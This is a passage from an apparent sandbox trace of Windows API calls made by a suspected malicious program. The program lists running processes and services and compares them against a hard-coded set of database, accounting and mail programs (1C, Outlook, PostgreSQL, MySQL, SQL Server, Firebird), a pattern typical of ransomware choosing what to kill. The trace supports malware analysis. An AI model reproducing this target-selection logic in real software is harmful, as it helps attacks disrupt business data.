(lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0262.918] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0262.918] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0262.918] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0262.918] lstrlenW (lpString="lsass.exe") returned 9 [0262.918] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0262.918] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0262.918] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0262.918] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0262.918] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0262.918] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0262.918] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0262.918] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0262.919] lstrlenW (lpString="lsm.exe") returned 7 [0262.919] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0262.919] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0262.919] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0262.919] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0262.919] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0262.919] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0262.919] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0262.919] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.919] lstrlenW (lpString="svchost.exe") returned 11 [0262.919] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.919] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.919] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.919] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.919] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.919] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.919] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.919] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.920] lstrlenW (lpString="svchost.exe") returned 11 [0262.920] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.920] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.920] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.920] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.920] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.920] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.920] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.920] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.920] lstrlenW (lpString="svchost.exe") returned 11 [0262.920] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.920] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.920] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.920] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.920] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.920] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.920] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.920] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.921] lstrlenW (lpString="svchost.exe") returned 11 [0262.921] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.921] lstrlenW (lpString="svchost.exe") returned 11 [0262.921] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0262.921] lstrlenW (lpString="audiodg.exe") returned 11 [0262.921] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.921] lstrlenW (lpString="svchost.exe") returned 11 [0262.921] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.922] lstrlenW (lpString="svchost.exe") returned 11 [0262.922] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0262.922] lstrlenW (lpString="userinit.exe") returned 12 [0262.922] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0262.922] lstrlenW (lpString="dwm.exe") returned 7 [0262.922] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0262.923] lstrlenW (lpString="explorer.exe") returned 12 [0262.923] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0262.923] lstrlenW (lpString="spoolsv.exe") returned 11 [0262.923] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0262.923] lstrlenW (lpString="taskhost.exe") returned 12 [0262.923] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.924] lstrlenW (lpString="svchost.exe") returned 11 [0262.924] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0262.924] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0262.924] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0262.924] lstrlenW (lpString="reader_sl.exe") returned 13 [0262.924] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0262.924] CloseHandle (hObject=0x3bc) returned 1 [0262.925] Sleep (dwMilliseconds=0x1f4) [0263.588] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea3a8 [0263.589] EnumServicesStatusExW (in: hSCManager=0x47ea3a8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0263.589] GetLastError () returned 0xea [0263.589] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xd68) returned 0x3dec5a0 [0263.589] EnumServicesStatusExW (in: hSCManager=0x47ea3a8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xd68, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0263.589] CloseServiceHandle (hSCObject=0x47ea3a8) returned 1 [0263.589] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0263.590] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0263.590] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0263.590] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0263.590] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0263.590] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0263.590] lstrlenW (lpString="AudioSrv") returned 8 [0263.590] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0263.590] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0263.590] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0263.590] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0263.590] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0263.590] lstrlenW (lpString="BFE") returned 3 [0263.590] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0263.590] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0263.590] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0263.590] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0263.590] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0263.590] lstrlenW (lpString="CryptSvc") returned 8 [0263.590] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0263.590] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0263.590] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0263.590] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0263.590] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0263.590] lstrlenW (lpString="CscService") returned 10 [0263.590] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0263.590] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0263.590] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0263.590] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0263.590] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0263.590] lstrlenW (lpString="DcomLaunch") returned 10 [0263.590] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0263.590] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0263.590] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0263.591] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0263.591] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0263.591] lstrlenW (lpString="Dhcp") returned 4 [0263.591] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0263.591] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0263.591] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0263.591] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0263.591] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0263.591] lstrlenW (lpString="Dnscache") returned 8 [0263.591] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0263.591] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0263.591] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0263.591] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0263.591] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0263.591] lstrlenW (lpString="DPS") returned 3 [0263.591] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0263.591] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0263.591] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0263.591] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0263.591] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0263.591] lstrlenW (lpString="eventlog") returned 8 [0263.591] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0263.591] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0263.591] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0263.591] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0263.591] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0263.591] lstrlenW (lpString="EventSystem") returned 11 [0263.591] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0263.591] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0263.591] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0263.591] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0263.591] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0263.592] lstrlenW (lpString="gpsvc") returned 5 [0263.592] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0263.592] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0263.592] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0263.592] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0263.592] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0263.592] lstrlenW (lpString="LanmanWorkstation") returned 17 [0263.592] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0263.592] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0263.592] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0263.592] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0263.592] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0263.592] lstrlenW (lpString="lmhosts") returned 7 [0263.592] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0263.592] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0263.592] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0263.592] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0263.592] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0263.592] lstrlenW (lpString="MMCSS") returned 5 [0263.592] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0263.592] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0263.592] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0263.592] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0263.592] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0263.592] lstrlenW (lpString="MpsSvc") returned 6 [0263.592] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0263.592] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0263.592] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0263.592] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0263.592] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0263.592] lstrlenW (lpString="NlaSvc") returned 6 [0263.592] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0263.592] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0263.593] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0263.593] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0263.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0263.593] lstrlenW (lpString="nsi") returned 3 [0263.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0263.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0263.593] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0263.593] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0263.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0263.593] lstrlenW (lpString="PcaSvc") returned 6 [0263.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0263.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0263.593] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0263.593] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0263.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0263.593] lstrlenW (lpString="PlugPlay") returned 8 [0263.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0263.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0263.593] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0263.593] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0263.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0263.593] lstrlenW (lpString="Power") returned 5 [0263.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0263.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0263.594] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0263.594] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0263.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0263.594] lstrlenW (lpString="ProfSvc") returned 7 [0263.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0263.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0263.594] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0263.594] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0263.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0263.594] lstrlenW (lpString="RpcEptMapper") returned 12 [0263.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0263.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0263.594] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0263.594] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0263.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0263.594] lstrlenW (lpString="RpcSs") returned 5 [0263.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0263.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0263.594] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0263.594] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0263.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0263.594] lstrlenW (lpString="SamSs") returned 5 [0263.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0263.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0263.595] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0263.595] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0263.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0263.595] lstrlenW (lpString="Schedule") returned 8 [0263.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0263.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0263.595] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0263.595] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0263.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0263.595] lstrlenW (lpString="SENS") returned 4 [0263.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0263.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0263.595] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0263.595] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0263.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0263.595] lstrlenW (lpString="ShellHWDetection") returned 16 [0263.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0263.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0263.595] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0263.595] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0263.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0263.595] lstrlenW (lpString="Spooler") returned 7 [0263.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0263.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0263.595] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0263.595] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0263.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0263.595] lstrlenW (lpString="SysMain") returned 7 [0263.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0263.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0263.595] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0263.595] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0263.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0263.596] lstrlenW (lpString="Themes") returned 6 [0263.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0263.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0263.596] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0263.596] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0263.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0263.596] lstrlenW (lpString="TrkWks") returned 6 [0263.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0263.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0263.596] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0263.596] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0263.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0263.596] lstrlenW (lpString="UxSms") returned 5 [0263.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0263.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0263.596] lstrcmpiW 